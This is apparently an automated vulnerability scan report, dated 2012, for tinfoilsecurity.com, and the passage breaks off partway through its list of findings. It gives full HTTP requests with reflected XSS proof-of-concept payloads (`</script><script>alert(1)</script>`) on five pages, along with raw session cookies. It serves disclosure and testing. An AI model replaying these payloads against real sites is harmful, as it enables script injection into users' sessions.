Report generated by XSS.CX at Thu Sep 27 13:43:52 EDT 2012.


Loading

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, www.tinfoilsecurity.com

1. Cross-site scripting (reflected)

1.1. https://www.tinfoilsecurity.com/ [name of an arbitrarily supplied request parameter]

1.2. https://www.tinfoilsecurity.com/about [name of an arbitrarily supplied request parameter]

1.3. https://www.tinfoilsecurity.com/pricing [name of an arbitrarily supplied request parameter]

1.4. https://www.tinfoilsecurity.com/tour [name of an arbitrarily supplied request parameter]

1.5. https://www.tinfoilsecurity.com/users/login [name of an arbitrarily supplied request parameter]

2. Password field with autocomplete enabled

3. Cross-domain script include

3.1. https://www.tinfoilsecurity.com/

3.2. https://www.tinfoilsecurity.com/about

3.3. https://www.tinfoilsecurity.com/pricing

3.4. https://www.tinfoilsecurity.com/tour

3.5. https://www.tinfoilsecurity.com/users/login

4. Frameable response (potential Clickjacking)

4.1. https://www.tinfoilsecurity.com/

4.2. https://www.tinfoilsecurity.com/about

4.3. https://www.tinfoilsecurity.com/favicon.ico

4.4. https://www.tinfoilsecurity.com/pricing

4.5. https://www.tinfoilsecurity.com/tour

4.6. https://www.tinfoilsecurity.com/users/login

5. Email addresses disclosed

6. Robots.txt file

7. Cacheable HTTPS response

7.1. https://www.tinfoilsecurity.com/

7.2. https://www.tinfoilsecurity.com/about

7.3. https://www.tinfoilsecurity.com/pricing

7.4. https://www.tinfoilsecurity.com/tour

7.5. https://www.tinfoilsecurity.com/users/login

8. SSL certificate



1. Cross-site scripting (reflected)  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.tinfoilsecurity.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b6fb</script><script>alert(1)</script>d67522de107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2b6fb</script><script>alert(1)</script>d67522de107=1 HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:37:51 GMT
Etag: "a38b09d305b6cdde97aa1e2135649a44"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: f1484989642d72c59a0d79a0aaa10155
X-Runtime: 0.028909
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 11308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<script type='text/javascript'>try {mixpanel.track("page_view", {"a_c":"pages:home","c":"pages","a":"home","path":"/?2b6fb</script><script>alert(1)</script>d67522de107=1","mp_note":"Viewing /?2b6fb</script>
...[SNIP]...

1.2. https://www.tinfoilsecurity.com/about [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /about

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 117f6</script><script>alert(1)</script>7da81091a6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about?117f6</script><script>alert(1)</script>7da81091a6f=1 HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/tour
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:27 GMT
Etag: "f56bd4e8986e18875720fefe5fffe8a0"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 297a37db96639e25ca46e7bc561cae9f
X-Runtime: 0.016096
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<script type='text/javascript'>try {mixpanel.track("page_view", {"a_c":"pages:about","c":"pages","a":"about","path":"/about?117f6</script><script>alert(1)</script>7da81091a6f=1","mp_note":"Viewing /about?117f6</script>
...[SNIP]...

1.3. https://www.tinfoilsecurity.com/pricing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /pricing

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc370</script><script>alert(1)</script>4323dc2c33a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pricing?dc370</script><script>alert(1)</script>4323dc2c33a=1 HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:39 GMT
Etag: "e130e96d021d5e73d6116936706fe114"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 3462b5254f74d48bc1eaa1c273d896da
X-Runtime: 0.015912
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 10974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<script type='text/javascript'>try {mixpanel.track("page_view", {"a_c":"pages:pricing","c":"pages","a":"pricing","path":"/pricing?dc370</script><script>alert(1)</script>4323dc2c33a=1","mp_note":"Viewing /pricing?dc370</script>
...[SNIP]...

1.4. https://www.tinfoilsecurity.com/tour [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /tour

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7adac</script><script>alert(1)</script>4245ac4e847 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tour?7adac</script><script>alert(1)</script>4245ac4e847=1 HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgphbGVydFQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIh9JbnZhbGlkIGVtYWlsIG9yIHBhc3N3b3JkLgY7AFQ6CUBub3dvOiRBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoTm93BjoLQGZsYXNoQAs%3D--019d16cebd48d4402740ffab9ba0a304a02e5fe4

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:26 GMT
Etag: "fd7844a157a1a881610a278927e504f3"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 0010fb6151764b6ee3bb8f76ec9786be
X-Runtime: 0.012310
X-Ua-Compatible: IE=Edge,chrome=1
Content-Length: 12534
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<script type='text/javascript'>try {mixpanel.track("page_view", {"a_c":"pages:tour","c":"pages","a":"tour","path":"/tour?7adac</script><script>alert(1)</script>4245ac4e847=1","mp_note":"Viewing /tour?7adac</script>
...[SNIP]...

1.5. https://www.tinfoilsecurity.com/users/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /users/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b238</script><script>alert(1)</script>17d06ac9ba2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/login?7b238</script><script>alert(1)</script>17d06ac9ba2=1 HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--2799446fbe2312d30d74a84cd3e647193a648df3

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:27 GMT
Etag: "4da7a02410158a826bd802da4547fb6f"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: c5427dc2311c1247cccc01d0a1c17c2c
X-Runtime: 0.020422
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<script type='text/javascript'>try {mixpanel.track("page_view", {"a_c":"sessions:new","c":"sessions","a":"new","path":"/users/login?7b238</script><script>alert(1)</script>17d06ac9ba2=1","mp_note":"Viewing /users/login?7b238</script>
...[SNIP]...

2. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /users/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /users/login HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--2799446fbe2312d30d74a84cd3e647193a648df3

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:21 GMT
Etag: "bdbd73da655ef22ba7a891548f5f4bc5"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 82c30cdb46719cffa4a12564bef72a5a
X-Runtime: 0.023102
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<div class="six columns centered offset-by-five">
<form accept-charset="UTF-8" action="/users/login" class="new_user" id="new_user" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input class="full-width" id="user_password" name="user[password]" size="30" type="password" />

<div id="remember-me" class="three columns alpha">
...[SNIP]...

3. Cross-domain script include  previous  next
There are 5 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfill, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. https://www.tinfoilsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:37:45 GMT
Etag: "65d9ae7a20e5be352e8b33e25c8811de"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 6adfef98b7981db6fd057ca672fe1eca
X-Runtime: 0.018001
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 11144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<link href="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-35f7df5c5243acd09c822039d6b4a986.css" media="screen" rel="stylesheet" type="text/css" />
<script src="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-6508873636c50de788d153e03567a806.js" type="text/javascript"></script>
...[SNIP]...

3.2. https://www.tinfoilsecurity.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/tour
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:17 GMT
Etag: "f1f3a1b178b3c15e9cc0e24eb6f50455"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 39a5948540de9cddfd7e80d6c8338644
X-Runtime: 0.010876
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<link href="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-35f7df5c5243acd09c822039d6b4a986.css" media="screen" rel="stylesheet" type="text/css" />
<script src="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-6508873636c50de788d153e03567a806.js" type="text/javascript"></script>
...[SNIP]...

3.3. https://www.tinfoilsecurity.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /pricing

Issue detail

The response dynamically includes the following script from another domain:

Request

